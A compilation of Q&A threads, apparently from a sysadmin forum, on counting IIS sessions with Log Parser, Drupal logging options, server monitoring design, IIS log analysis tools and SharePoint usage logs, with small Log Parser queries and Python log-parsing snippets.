Logparser to get number of sessions by hour - IIS

How can I use Log Parser to see how many unique sessions there are in each hour of my IIS logs?

According to this post it's not as easy as it seems since Log Parser doesn't support COUNT(DISTINCT), but there is a workaround in post #2.
If you're interested in useful queries, there's an old post over at https://serverfault.com/questions/45516/recommended-logparser-queries-for-iis-monitoring with some handy snippets; you could easily update the unique-errors query to look for a status code of 200 (although you'd have to filter down to just your own pages).
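The workaround boils down to two passes: use SELECT DISTINCT to collapse duplicates into a temporary file, then count the rows. A sketch, assuming the default W3C log fields and treating a distinct client IP per hour as a "session" (the file names are placeholders, and since IIS logs don't record real sessions, c-ip is only an approximation):

```
rem Pass 1: one row per distinct (hour, client IP) pair
logparser -i:IISW3C -o:CSV "SELECT DISTINCT TO_STRING(TO_TIMESTAMP(date, time), 'yyyy-MM-dd HH') AS Hour, c-ip INTO hourly.csv FROM ex*.log"

rem Pass 2: count the distinct rows per hour
logparser -i:CSV "SELECT Hour, COUNT(*) AS Sessions FROM hourly.csv GROUP BY Hour ORDER BY Hour"
```

If you log cookies (cs(Cookie)) you could substitute that for c-ip to get closer to real sessions, at the cost of much larger intermediate files.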

By default, your IIS logs will not show session information, just HTTP requests. You might be able to output session information to your IIS logs, but it would depend primarily on what application platform you are running and where you are storing session state. For example, if you were using .NET, you could use the AppendToLog method. You could also look into custom logging, but it would depend on what version of IIS you are running. Under IIS 6 you could implement a custom logger. Under IIS 7 you can use the Advanced Logging extension.
Having no awareness of your platform or tech stack I'm not in a position to say, but you could also look into something like ELMAH, which Scott Hanselman has blogged about a lot. If you are running a .NET web app, it seems to have a lot of features already built for you, so perhaps that would be an easier route to your desired goal.

Related

Securing Drupal: Alternative to Watchdog?

Hi, I'm going through and securing a site I have that runs Drupal 7, using the Security Review module. One of the recommendations is to not use watchdog to log events to the screen, i.e. the database, I guess. If I turn that off, would there be another secure way to send logs to my workstation so that I can monitor traffic to the site, i.e. what people view, broken links and the like?
I'm on a shared host, not a dedicated host. I did a search on some different ways to do this, but I really don't know where to start. Should I download a module to do this? Or does Drupal report all this information to the server logs? Sorry if I'm not formatting this question correctly, but I'm not too clear on how to do this.
Are you sure the recommendation is about Drupal's watchdog, and not about displaying error messages on the pages? These are two different things.
That said, in Drupal, the watchdog is only an API to log system messages. Where the messages go, and how they are actually logged, is a pluggable system. By default, Drupal uses a module called "Database logging" (dblog) to log messages to the database. A syslog module is also provided, but it is not really an option if you are on shared hosting. A quick search reveals modules to send messages to Logentries, Logstash (and Loggly), Slack, LogIO, email, etc.
If you have a gigantic site with millions of hits a day then, yeah, don't use watchdog.
But if it's just a small site, just use watchdog to log your events. And seeing as it's on a shared host, it's not a high-profile site. Using watchdog is fine.

How to Design a web application to monitor server status in web browser

I just want to try creating a web application to monitor server status. I need some design guidelines.
Should I use some scripting language like Python or Ruby to get the stats? Is polling the only way to do it? If so, how frequently should we poll?
If you don't care about data retention, writing a simple web app in ruby or python that polls from the browser would probably be fine. You could alternately use websockets and push data from a CLI-based monitoring agent of some sort that ran in the background on your server.
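For the simple polling case, here is a minimal sketch in Python using only the standard library (the port, endpoint, and function names are my own; `os.getloadavg` is Unix-only, and a real agent would collect far more than load averages):

```python
import json
import os
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

def collect_stats():
    """Gather a few basic stats; extend with disk, memory, etc. as needed."""
    load1, load5, load15 = os.getloadavg()  # Unix-only
    return {"timestamp": time.time(), "load1": load1,
            "load5": load5, "load15": load15}

class StatsHandler(BaseHTTPRequestHandler):
    """Answers every GET with a JSON snapshot for the browser to poll."""

    def do_GET(self):
        body = json.dumps(collect_stats()).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(body)

def serve(port=8000):
    # The browser polls this endpoint, e.g. fetch("/stats") every 15-30 s;
    # poll slowly enough that monitoring doesn't become load of its own.
    HTTPServer(("", port), StatsHandler).serve_forever()
```

Polling every 15-30 seconds is a reasonable starting point for a dashboard; websockets only really pay off once you need sub-second updates or many concurrent viewers.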
If you don't care about data fidelity, then you might be able to use something simple like pingdom.
If you do care about data retention and you need lots of custom monitoring, then it's a much harder problem. There are a number of open source projects and paid applications that will solve this problem in various ways. As mentioned in the comment on your post, ganglia could work. You might also look into nagios or munin. If you need app level stats, you could check out statsd/graphite or influxdb/grafana.
If you want server monitoring but don't want to manage additional infrastructure, there are a lot of solutions in the paid space including librato, newrelic, and instrumental.
Note: I am an owner of Instrumental, so I'm biased toward that, but I think your question needs more details to narrow down any recommendations on infrastructure monitoring.

what are the tools to parse/analyze IIS logs - ideally free/open source?

Note: there are a few similar questions already asked here - but they are from 2009. Maybe something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question - what is the best tool to view ISSUES with a website based on IIS logs (i.e. 404 and 500 responses, long page processing times, etc.)? Ideally with grouping/sorting options? I do not want to spend a lot of time on this; I just want to periodically check that all is good with the website.
Second question (and I know I'm most likely asking for too much) - is there any way to expose the processed logs to the web? So I can review the things mentioned above without RDPing into the server?
Ideally I'm looking for a free/open source solution, but I'm ready to pay for a good software as well (but not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates set up for IIS, and we can consolidate the logs in a database with web access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in and ignore the ones you are not - and thus save space in your database.
You can also set up real-time alerts, so that you get an email when a critical error, like a 500, is encountered in a log file.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug-in command line tools which can verify that a given web page is accessible, or get alerted when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can set up comprehensive monitoring with a single product.
I'd look into #LuckyLuke's solution (or similar) - the classic "build vs buy" decision. Based on your post, this isn't going to be your "full time" job, so IMHO it's best to leave it to those for whom it is...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own Log Parser, and depending on how far you want to go with it, you can use it (it's a COM DLL) to write your own "admin web pages" in .NET/ASP.NET and host them on each of your servers...
If you're very specific about the errors you want to be alerted about, another "hacky" way would be to provide your own custom error pages (either replacing the default IIS error pages, or configuring your ASP.NET apps to use specific error pages).
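If you do go the tinkering route, the W3C format is easy to parse yourself; a minimal sketch in Python (the field names assume the default IIS W3C logging configuration, and the function names are my own):

```python
from collections import Counter

def parse_w3c(lines):
    """Parse IIS W3C extended log lines using the #Fields directive.

    Yields one dict per request; the field names come straight from the
    log's own #Fields header (e.g. cs-uri-stem, sc-status).
    """
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def error_summary(lines):
    """Count 4xx/5xx responses per URL - the 'issues' view described above."""
    counts = Counter()
    for req in parse_w3c(lines):
        status = req.get("sc-status", "")
        if status.startswith(("4", "5")):
            counts[(status, req.get("cs-uri-stem", "?"))] += 1
    return counts.most_common()
```

From there, rendering the summary as a page your team can reach without RDP is the easy part; the grouping and sorting you asked about falls out of the Counter.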

How to write my own Server Logging script?

I need to log the hits on sub-domains in Windows IIS 6.0 without designating them as separate websites in IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid Google Analytics is not an option due to the setup; I just need access (I'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties so it collects them all? I'm writing my own log-parsing software, as I need specific things; I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out Microsoft's Log Parser tool. That should at least take care of the more onerous part of the task (actually making sense of the log files). From there it is a pretty straightforward reporting operation.
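As a sketch of that reporting step, assuming the cs-host field is enabled in the site's W3C logging options (the Host header is the only way to tell sub-domains apart when they share one IIS website; the function name is my own):

```python
from collections import Counter

def hits_per_host(lines):
    """Tally requests per sub-domain from a shared IIS W3C log.

    Relies on the log's #Fields header to locate the cs-host column,
    so it works regardless of which other fields are enabled.
    """
    fields, counts = [], Counter()
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            counts[row.get("cs-host", "?")] += 1
    return counts
```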

How is it possible to access Sharepoint Farm logs?

I have been looking at the "_layouts/SpUsageSite.aspx" logs for my site, but they are giving erroneous results (e.g. 0 unique visitors when I know at least I have been on the site).
What is the best way to view these logs, beyond the out-of-the-box functionality?
Did you enable usage processing and usage logging for the site in question?
You can enable them in your Central Administration under:
Operations -> Usage analysis processing
It may also be that the processing is limited to a specific timespan.
I have come across a bug with the Usage analysis processing to do with UTC date conversion which resulted in the processed numbers being erroneous. This is apparently fixed in SP2, but we have not been able to implement this quite yet.
The alternative is a bit onerous, as you need to copy the usage logs from each front-end server to one location and configure Log Parser to store the information in a database.
Serge van den Oever steps through this quite well here.
I don't really recommend this as a regular process as it takes a lot of effort, but it does give you a huge amount of information for when you wish to take a detailed look at usage of a particular part of your SharePoint farm.
Ideally we would have a solution to parse the logs automagically using the log parser utility and provide that information in SSRS reports.
We patched to sp2 and it all started working again like magic.
